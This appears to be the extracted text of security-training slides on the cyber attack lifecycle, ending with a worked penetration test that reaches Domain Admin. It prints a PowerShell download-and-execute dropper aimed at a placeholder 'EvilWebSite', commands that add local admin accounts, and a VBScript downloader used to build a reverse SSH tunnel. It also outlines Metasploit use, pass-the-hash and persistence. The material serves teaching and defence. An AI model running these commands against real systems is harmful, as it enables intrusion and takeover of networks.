2. 1. Objectives
2. Introduction
3. Cyber Attack Lifecycle
4. Vulnerabilities and Exploitation
5. Social Engineering and Advanced Persistent
Threats
6. Example of a penetration test scenario
7. Conclusion
5. Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that
involves a computer and a network
Two types of Cyber Crime:
Technology is the Target. Enterprise, State
systems, personal systems
Technology is the Instrument. Criminal
activities on Internet
This session is focused on the first type
6. Introduction
Technology = Target Technology = instrument
Distributed Deny of Service Pedopornography
Hacking incitement to racial hatred
Malwares, Ransomwares Incitement to terrorism
Phishing Money Laundering
Hacktivism Drug sell
… Spam
…
7. Introduction
Cyber Crime
Drastically evolved over the past years, following the global evolution of ICT
supporting human activity
Allow cyber criminals to make profit equivalent as other types of criminality
Offers some advantages over other criminal activities: anonymity, discretion,
borderless
Remain little fought and with no international legislation
Has evolved to cyber war with state-sponsored attacks
Will affect our life (connected cars, Operational Technologies, IOT)
Cost of Cyber Crime in Belgium: 3,5 billion Euros
8. Introduction
Evolution of Cyber Crime
S
O
P
H
I
S
T
I
C
A
T
I
O
N
1985-1995
Entertainmen
t
First Worms
Phone Hacking
2010-2017-…
Hacktivism
Virus Spread
Website Defacement
Organized Crime
DDOS
Company Systems
Hacking
Data Lead
Industrial espionage
Cyber War
Targeted Attacks
State-Sponsored Attacks
9. Introduction
Cyber War – NSA
Hacking Tools Leak
(2017)
2. NSA Contractor installs trojan
3. NSA Contractor runs full scan
1. NSA Contractor has NSA
Hacking tools on his PC
4. Kaspersky AV discovers malware + NSA hacking tools
5. Russian spies are
somehow aware of the
discovery of NSA tools
Kaspersky Denies giving info
6. Russian Spies further Hack contractor PC
11. Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises with important
impacts (financial, image..)
Predominance of Advanced Persistence Threats targeting the end user
99% of System Compromises will still use unpatched Vulnerabilities
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and operational
technologies
MIRA botnet – 2017
Hackable Cardiac devices – 2017
WIFI Baby Heat Monitor device -2017
Jeep SUV Hack - 2015
12. Introduction
Legal evolution
General Data Protection Regulation (GDPR) – adopted end of
2016 – comes into force 25 may 2018
Circulars of National Bank of Belgium
Regulation for financial sector
Data Breach notification standard
Within 72 hours
Fines in case of data leak
Max 4% of turnover, maximum 20 M€
14. Cyber Attack Lifecycle
- Public Information
- Social Networks
- Vulnerability Scanning
- Physical Observation
1 Reconnaissance 2 Initial Infection
- Vulnerabilities
- Virus / Malware
- Social Engineering
- Physical Intrusion
3 Gain Control 4 Privilege Escalation
Control infected system
5 Lateral Movement
Compromise more systems
deeper in the network
7 Malicious Activities
Data Exfiltration
Hacking Websites
Money Extortion
..Gain elevated privileges on
the infected system
6 Persistence
Maintain persistent
connection with infected
systems
15. Cyber Attack Lifecycle
> Reconnaissance
Reconnaissance process is a key activity
Indeed, during this phase crucial information are obtained in order
to perform a cyber attack
For instance, information will be used to determined the best
attack vector to be used
Activities performed are:
Collect information concerning the target (websites, telephone
numbers, general mailboxes..) through public information
Collect information through direct contact sur as phone calls (fake
poll, job seeker..)
Collect technical information concerning the target information
system (exposed systems, partners, data centers..)
Collect information on premises (garbage, WIFI scanning..)
Actively scan enterprise networks exposed on Internet
17. Cyber Attack Lifecycle
> Reconnaissance
Following reconnaissance activities, attackers must have obtained enough
information in order to determine best attack vectors in order to perform the
initial infection phase
For instance:
Vulnerabilities infecting systems exposed on Internet
Lack of physical access to facilities
Social engineering attack on selected profiles from, for instance, social networks information
18. Cyber Attack Lifecycle
> Initial Infection
Initial Infection is aimed at obtaining a first backdoor within the
target information system
Vectors:
Exploiting a vulnerability affecting the victim’s system(s)
Infection through Virus / Malware
Exploiting a physical vulnerability
21. Cyber Attack Lifecycle
> Initial Infection
IDS/IPS Bypass
Encryption
Anti-Virus Bypass
Use simple Powershell as a dropper which fetches an encrypted payload over
Internet
powershell.exe "IEX ((new-object
net.webclient).downloadstring('http://EvilWebSite/payload.txt '))
Unknown Viruses
Use Staging to decouple payload from initial dropper.
The dropper is injected directly into memory
Fileless malware infection
Firewall Bypass
Uses “reverse” connections which connect to the C&C
E.g. HTTPS passing through the Enterprise Proxy
22. Cyber Attack Lifecycle
> Initial Infection
Metasploit + SET (Social Engineering Toolkit)
Create a Meterpreter backdoor using SET for the Payload
and Metasploit for the C&C server
Create Powershell Payload
23. Cyber Attack Lifecycle
> Initial Infection
Metasploit + SET (Social Engineering Toolkit)
Create a Meterpreter backdoor using SET for the Payload
and Metasploit for the C&C server
Move Payload to evil Web Server
24. Cyber Attack Lifecycle
> Initial Infection
Metasploit + SET (Social Engineering Toolkit)
Create a Meterpreter backdoor using SET for the Payload
and Metasploit for the C&C server
Create the « Dropper »
25. Cyber Attack Lifecycle
> Initial Infection
Metasploit + SET (Social Engineering Toolkit)
Create a Meterpreter backdoor using SET for the Payload
and Metasploit for the C&C server
Start the Listener
26. Cyber Attack Lifecycle
> Gain Control
Once initial infection is performed, the objective is to get
control over the machine.
For this a network connection must be established between
the victim and the Command & Control Server
In general « reverse » connection is made to bypass
inbound Firewall protection
Several techniques to bypass Outbound filtering (if present.)
27. Cyber Attack Lifecycle
> Gain Control
Standard Enterprise security principles for Outbound
filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol
Outbound connections must pass other checks as well.
Outbound filtering evasion techniques examples
Reverse HTTP and / or HTTPS traffic (without or with Proxy
settings verification
Payload Staging over DNS by setting the payload into TXT
Records of a Domain
28. Cyber Attack Lifecycle
> Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload
that uses in-memory DLL injection stagers and is extended
over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby
API. It features command history, tab completion, channels,
and more.
29. Cyber Attack Lifecycle
> Privilege Escalation
Escalate privileges from infected machines in order gain elevated access
Typical example is getting Administrator privileges
Several techniques
« Local Exploits » from local applications on the infected machine
Manual search for credentials in scripts
Password Hashes dump (e.g. SAM, /etc/passwd) and cracking
Authenticated Sessions grabbing (e.g. VPN Sessions)
LSASS Process Dump (MimiKatz)
SSH Keys
World Writeable files
Read command history files
Batches / Jobs alteration
Process Injection
Try injecting malicious code in processes running under « Domain Admin » privileged user
30. Cyber Attack Lifecycle
> Privilege Escalation
Metasploit: « Incognito » module
Allows to impersonate authentication tokens on compromised windows hosts
Backdoor must run under « SYSTEM » or « Administrator » privilege in order
to see interesting authentication tokens
TIP: File servers are virtual treasure troves of tokens since most file servers
are used as network attached drives via domain logon scripts
31. Cyber Attack Lifecycle
> Lateral Movement
From Infected systems, try to infect more systems deeper in
the Network
Basically repeat the cyber Attack Lifecycle process (recon, initial
infection, privilege escalation…)
Aim for high value systems, windows domain controllers, file
servers..
Techniques
Credential re-use / pass-the-hash / SSH keys re-use
Internal applications vulnerabilities (less often patched)
Network segmentation issues between environments ( e.g. Port 445) –
PsExec with Pass-The-Hash
32. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow and even aid in
the compromise of other otherwise inaccessible systems
33. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Use Autoroute to make the compromised host a pivot to
other networks
34. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Scan the network through the route created on ports 139 &
445
35. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Start a new session on a new host using PsExec and “Pass-The-
Hash” technique re-using local Administrator password hash
36. Cyber Attack Lifecycle
> Maintain Persistence
Prevent loss of connection between infected machines and the C&C
Techniques
Create jobs / schedule tasks
Create service running on startup
Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
Bootkit / Rootkit
Default file association
Logon Scripts
Modification of Applications / Services
Registry RUN keys
37. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
38. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
39. Cyber Attack Lifecycle
> Demo
Social Engineering scenario
Send a « Virus » to the victim which consists of a Metasploit
Meterpreter instance
Undetected by up to date commercial antivirus
1. Prepare Malware
& environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact
41. Vulnerabilities and Exploitation
A vulnerability is a flaw in a system which allows a malicious user to compromise
its Confidentiality, Integrity and / or its availability
Simple – Default Password. Complex – Buffer Overflow in an application
Dozens of new vulnerabilities officially classified everyday
http://www.cvedetails.com
Dozen of others are not disclosed!
0DAY – Vulnerabilities not discovered, or not disclosed
Vulnerabilities are discovered by
Researchers, students (Ethical Hackers)
Professional researchers ( Vulnerability Brokers )
http://www.zerodayinitiative.com/
France- Vupen Security – Sells vulnerabilities to NASA
Cyber Criminals( 0DAYS )
42. Vulnerabilities and Exploitation
Full Disclosure principle
Vulnerabilities are reported and published publicly as soon as discovered without taking into
account that a patch is available
Responsible disclosure principle
Vendors are notified first
Vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground Websites on TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de
(ALL), blackhat.com (US)
44. Vulnerabilities and Exploitation
Complexity of systems, applicative codes, communication flows,
network segmentation
Out-of-the-box vulnerabilities of Vendor solutions, lack of security
configuration
Next->Next->Next Syndrome
Lack of secure coding awareness
TOP 10 OWASP
Lack of enforcement for Security during IT Projects
Security implies Cost and Time
Need for functionality <-> Need for security
BlackList Mode
Learning Mode
46. Human Vulnerabilities / Social Engineering
Social engineering is the preferred attack vector as it is generally easier
to bypass preventive security measures
Targets can be the company employees but also partners /
subcontractors
Two types of social engineering:
Human SE
Technical SE
47. Human Vulnerabilities / Social Engineering
Technical SE is aimed at compromising end user systems
Transmission of the malware follows « authorized » routes, such as e-
mail and/or web browsing
Bypass security measures such as perimeter security, firewalls,..
1. INFECTION
2. CONTROL
48. Human Vulnerabilities / Social Engineering
Attack methodologies:
Encourage users to install tools such as « TeamViewer » or « LogMeIn »
Send malware through e-mail
Word/Excel with malicious Macros
PDF files exploiting PDF vulnerabilities
Send mail containing links to malicious web sites
Send Phishing SMS on Smartphones (SMShing)
Drop USB Keys containing Viruses (STUXNET)
USB Gadgets configured to simulate a Keyboard
49. Human Vulnerabilities / Social Engineering
Nowadays systems are in general protected against
USB Infection through autorun functionality
New method -> « Hacker Interface Devices »
Attackers embed malicious code within USB Gadgets
Once connected, those gadgets simulate being a keyboard and start sending commands
to the computer (Keystroke Injection)
Those commands can drop a malware as easily as other techniques
Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
USB Gadgets
51. Penetration test example
Context: Black Box Intrusion test. Scope: External-
facing systems
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’EntrepriseInternal Network
52. Penetration test example
VULN 1/2: Vulnerable deployment of SAP BO (
Apache Axis2 )
CVE-2010-0219 , Apache Axis2 Default Credentials
http://www.securityfocus.com/bid/40343 , Apache
Axis2 Directory traversal
See earlier:
Vuln « Directory Traversal »
Vuln « Default Password »
Allows to have admin credentials to Axis2
55. Penetration test example
A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects
Authenticated Code Execution
http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
We use it to deploy a reverse shell backdoor on the server to connect back
to port 80
VULN 3: Servers is allowed to contact any host on Internet on port 80 and
443
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
C&C SERVER – PORT 80
Port 80
Internal
Network
56. Penetration test example
Not possible to upload a meterpreter (killed by AV on the
machine)
Possible to upload a backdoor which sends me back a DOS
command prompt on the server
57. Penetration test example
Next steps: Create privileged account on the server
VULN 4: Application server is running under ADMIN privileges
Net user temptest password /add
Net localgroup Administrators hacked /add
Obtain a Remote Desktop connection
Problem: Port 3389 closed Inbound
Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443
58. Penetration test example
To create the tunnel, I need to download a SSH Client on the Server
using DOS command prompt
I create a VBSCRIPT script using « Echo » command, then execute the
VBSCRIPT
Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >>
dl.vbs
Cscript dl.vbs
Use plink to create the tunnel
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "c:tempplink.exe", 2 '//overwrite
end with
59. Penetration test example
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443
Connect to RDP through the tunnel and use the user
account I just created to connect
temptest
password
60. Penetration test example
Next Step -> Lateral Movement – the simplest first,
credentials reuse
I need to crack all passwords present locally on the infected
server
Vuln 6/7: Windows 2003 Design Vulnerabilities
VULN 6: « Repair » file contains a SAM backup file containing
encrypted credentials using LMHASH
VULN: LMHASH encryption algorithm is broken and can be
cracked easily
62. Penetration test example
VULN 8: Local Administrator password is replicated over all
systems in the DMZ
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443 Web Servers
Web Servers
Web Servers
Port 3389
63. Penetration test example
Next-Step: Try to hit Internal Network
VULN 9 : DMZ Systems members of Internal Windows Domain.
Means that critical ports ( e.g. 139, 445, … ) must be open between
DMZ and Internal network
VULN 10 : Password Replication Bis – A Domain Admin user account
whose name is identical has a local account has the same password
64. Penetration test example
I connect to the Domain Controller from the DMZ using the
Domain Admin account. I am now Domain Administrator and has
full control over the Enterprise Domain
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
Contrôleur de Domaine
Domain Controller